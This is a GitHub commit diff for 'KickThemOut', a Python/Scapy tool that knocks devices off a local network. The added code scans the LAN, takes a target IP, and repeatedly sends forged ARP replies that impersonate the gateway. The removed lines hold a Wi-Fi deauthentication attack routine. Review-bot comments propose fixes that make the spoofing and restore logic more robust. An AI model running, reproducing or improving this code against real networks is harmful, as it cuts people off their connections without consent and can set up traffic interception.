kickONEOff working + fixes

xdavidhu 2016-12-30 22:17:24 +01:00 committed by GitHub
parent af0429d7a6
commit 6fe8318eb4
3 changed files with 125 additions and 71 deletions


@ -9,6 +9,11 @@ See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject)
import time, os, sys, logging import time, os, sys, logging
from time import sleep from time import sleep
from scapy.all import *
import math
import scan
import spoof
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m' BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
@ -36,7 +41,52 @@ def optionBanner():
print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE) print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE)
def kickoneoff(): def kickoneoff():
print('kickoneoff') os.system("clear||cls")
global defaultInterface
global defaultInterfaceMac
global defaultGatewayIP
global defaultGatewayMac
global hostsList
global onlineIPs
print ""
print ("{0}kickONEOff{1} selected...{2}").format(RED, GREEN, END)
print ""
scanNetwork()
print "Online IPs: "
for ip in onlineIPs:
print (" {0}" + ip + "{1}").format(RED, END)
print ""
one_target_ip = raw_input("IP of the target: ")
one_target_mac = ""
for host in hostsList:
if host[0] == one_target_ip:
one_target_mac = host[1]
if one_target_mac == "":
print ""
print("IP address is not up. Please try again.")
return
print ""
print("{0}Target mac => '{1}" + one_target_mac + "{2}'{3}").format(GREEN, RED, GREEN, END)
print ""
print("{0}Spoofing started... {1}(press CTRL + C to stop)").format(GREEN, END)
print ""
try:
while True:
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, one_target_ip, one_target_mac)
time.sleep(15)
except KeyboardInterrupt:
print ""
print("{0}Re-arping{1} target...{2}").format(RED, GREEN, END)
rearp = 1
while rearp != 10:
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, one_target_ip, one_target_mac)
rearp = rearp + 1
time.sleep(0.5)
print ""
print("{0}Done.{1}").format(GREEN, END)
def kicksomeoff(): def kicksomeoff():
print('kicksomeoff') print('kicksomeoff')
@ -44,71 +94,77 @@ def kicksomeoff():
def kickalloff(): def kickalloff():
print('kickalloff') print('kickalloff')
""" def scanNetwork():
def deauth_attack(iface, bssid): global hostsList
hostsList = scan.scanNetwork()
client = 'FF:FF:FF:FF:FF:FF' def getDefaultInterface():
def long2net(arg):
if (arg <= 0 or arg >= 0xFFFFFFFF):
raise ValueError("illegal netmask value", hex(arg))
return 32 - int(round(math.log(0xFFFFFFFF - arg, 2)))
conf.iface = iface def to_CIDR_notation(bytes_network, bytes_netmask):
conf.verb = 0 network = scapy.utils.ltoa(bytes_network)
packet = RadioTap()/Dot11(type=0,subtype=12,addr1=client, netmask = long2net(bytes_netmask)
addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7) net = "%s/%s" % (network, netmask)
if netmask < 16:
return None
print('\nChoose option from menu:\n') return net
print('\t{0}[{1}1{2}]{3} Kick Once').format(YELLOW, RED, YELLOW, WHITE)
sleep(0.2)
print('\t{0}[{1}2{2}]{3} Keep Kicking').format(YELLOW, RED, YELLOW, WHITE)
sleep(0.2)
choice = None for network, netmask, _, interface, address in scapy.config.conf.route.routes:
while choice == None:
header = ('\n{0}kickthemout{1}> '.format(BLUE, WHITE)) # skip loopback network and default gw
choice = raw_input(header) if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0':
if choice == '1': continue
pcounter_header = ('{0}kickthemout{1}> numofpackets: '.format(BLUE, WHITE))
pcounter = raw_input(pcounter_header) if netmask <= 0 or netmask == 0xFFFFFFFF:
print(pcounter) # {TESTING} continue
packets_sent = 0
for i in range(int(pcounter)): net = to_CIDR_notation(network, netmask)
sendp(packet)
packets_sent += 1 if interface != scapy.config.conf.iface:
print 'Deauth sent via: ' + iface + ' to BSSID: ' + bssid + '.\nPackets sent: ' + str(packets_sent) continue
sleep(2)
elif choice == '2': if net:
time_header = ('{0}kickthemout{1}> keepkickingfor(mins): '.format(BLUE, WHITE)) return interface
attack_time = float(raw_input(time_header))
start = time.time() def getGatewayIP():
packets_sent = 0 getGateway_p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False)
while (time.time() - start) != attack_time: return getGateway_p.src
sendp(packet)
packets_sent += 1
print 'Deauth sent via: ' + iface + ' to BSSID: ' + bssid + '.\nPackets sent: ' + str(packets_sent)
sleep(2)
else:
choice = None
print('*INVALID OPTION*') # {TESTING}
"""
def main(): def main():
heading() heading()
global defaultInterface
global defaultInterfaceMac
global defaultGatewayIP
global defaultGatewayMac
global hostsList
global onlineIPs
defaultInterface = getDefaultInterface()
defaultGatewayIP = getGatewayIP()
defaultInterfaceMac = get_if_hwaddr(defaultInterface)
scanNetwork()
onlineIPs = []
for host in hostsList:
onlineIPs.append(host[0])
if host[0] == defaultGatewayIP:
defaultGatewayMac = host[1]
print("\n{0}Using interface '{1}"+defaultInterface+"{2}' with mac address '{3}"+defaultInterfaceMac+"{4}'.\nGateway IP: '{5}"
+ defaultGatewayIP + "{6}'. {7}" + str(len(hostsList)) + "{8} hosts are up.{9}").format(GREEN, RED, GREEN, RED, GREEN, RED, GREEN, RED, GREEN, END)
try: try:
# CHECK FOR WIRELESS CARD
iface_header = ('\n{0}kickthemout{1}> interface: '.format(BLUE, WHITE))
iface = raw_input(iface_header)
# SCAN (AIRODUMP-NG) & PARSE (BSSIDs)
# ...
bssid_header = ('{0}kickthemout{1}> bssid: '.format(BLUE, WHITE))
bssid = raw_input(bssid_header) # {TESTING}
while True: while True:
optionBanner() optionBanner()
header = ('{0}kickthemout{1}> '.format(BLUE, WHITE)) header = ('{0}kickthemout{1}> {2}'.format(BLUE, WHITE, END))
choice = raw_input(header) choice = raw_input(header)
if choice.upper() == 'E' or choice.upper() == 'EXIT': if choice.upper() == 'E' or choice.upper() == 'EXIT':
@ -131,7 +187,7 @@ def main():
except KeyboardInterrupt: except KeyboardInterrupt:
print('\nThanks for dropping by.' print('\nThanks for dropping by.'
'\nCatch ya later!') '\nCatch ya later!{0}').format(END)
if __name__ == '__main__': if __name__ == '__main__':
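Review bot: `defaultGatewayMac` is assigned in `main()` only when the gateway's IP appears in the scan results (`if host[0] == defaultGatewayIP:`), but the `except KeyboardInterrupt` branch of `kickoneoff()` reads it unconditionally. As far as the visible lines show, a gateway that did not answer the scan makes the restore loop fail with a NameError, so the target's ARP entry is never corrected. Initialise it before the loop with `defaultGatewayMac = None` and stop early when it is still unset, e.g. `if defaultGatewayMac is None: sys.exit("gateway MAC not found")`. `kickoneoff()` also rescans through `scanNetwork()` but prints `onlineIPs`, which is built only once in `main()`, so the list shown can disagree with the `hostsList` the target is looked up in. `main()` continues outside the visible hunks.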

30
scan.py

@ -1,4 +1,4 @@
#kickthemout/scan.py by @xdavidhu #kickthemout/scan.py by @xdavidhu, and also by Benedikt Waldvogel (https://github.com/bwaldvogel/neighbourhood)
def scanNetwork(): def scanNetwork():
import scapy.config import scapy.config
@ -27,7 +27,7 @@ def scanNetwork():
def scan_and_print_neighbors(net, interface, timeout=1): def scan_and_print_neighbors(net, interface, timeout=1):
hostsList = [] hostsList = []
try: try:
ans, unans = scapy.layers.l2.arping(net, iface=interface, timeout=timeout, verbose=True) ans, unans = scapy.layers.l2.arping(net, iface=interface, timeout=timeout, verbose=False)
for s, r in ans.res: for s, r in ans.res:
mac = r.sprintf("%Ether.src%") mac = r.sprintf("%Ether.src%")
ip = r.sprintf("%ARP.psrc%") ip = r.sprintf("%ARP.psrc%")
@ -45,22 +45,20 @@ def scanNetwork():
raise raise
return hostsList return hostsList
for network, netmask, _, interface, address in scapy.config.conf.route.routes:
if __name__ == "__main__": # skip loopback network and default gw
for network, netmask, _, interface, address in scapy.config.conf.route.routes: if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0':
continue
# skip loopback network and default gw if netmask <= 0 or netmask == 0xFFFFFFFF:
if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0': continue
continue
if netmask <= 0 or netmask == 0xFFFFFFFF: net = to_CIDR_notation(network, netmask)
continue
net = to_CIDR_notation(network, netmask) if interface != scapy.config.conf.iface:
# see http://trac.secdev.org/scapy/ticket/537
continue
if interface != scapy.config.conf.iface: if net:
# see http://trac.secdev.org/scapy/ticket/537 return scan_and_print_neighbors(net, interface)
continue
if net:
return scan_and_print_neighbors(net, interface)
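Review bot: With the route loop moved out of the `__main__` guard, `scanNetwork()` falls off the end of the loop and returns None when no route passes the filters. The main script iterates the result directly (`for host in hostsList:`), which would then raise a TypeError instead of reporting that no hosts were found. Add `return []` after the loop so callers always receive a list. The start of `scanNetwork()` lies outside this hunk, so this assumes nothing after the loop returns a value.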


@ -1,6 +1,6 @@
#kickthemout/scan.py by @xdavidhu #kickthemout/scan.py by @xdavidhu
def sendPacket(my_mac, interface, my_ip, target_ip, target_mac): def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
import sys import sys
from scapy.all import ( from scapy.all import (
@ -15,7 +15,7 @@ def sendPacket(my_mac, interface, my_ip, target_ip, target_mac):
ether.src = my_mac ether.src = my_mac
arp = ARP() arp = ARP()
arp.psrc = my_ip arp.psrc = gateway_ip
arp.hwsrc = my_mac arp.hwsrc = my_mac
arp = arp arp = arp
@ -28,4 +28,4 @@ def sendPacket(my_mac, interface, my_ip, target_ip, target_mac):
arp.op = 2 arp.op = 2
packet = ether/arp packet = ether/arp
sendp(x=packet) sendp(x=packet, verbose=False)
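Review bot: The header comment of this file still reads `#kickthemout/scan.py` although it defines `sendPacket` (presumably spoof.py), and the function has no docstring after the signature change. The name `my_mac` is now misleading: it is written to both `ether.src` and `arp.hwsrc`, and the restore path in the main script passes the gateway's MAC in that position. Document it next to the signature, e.g. `# my_mac: MAC advertised for gateway_ip (own MAC while spoofing, the gateway's MAC when restoring)`, and drop the no-op `arp = arp`. The body of `sendPacket` is only partly visible in these hunks.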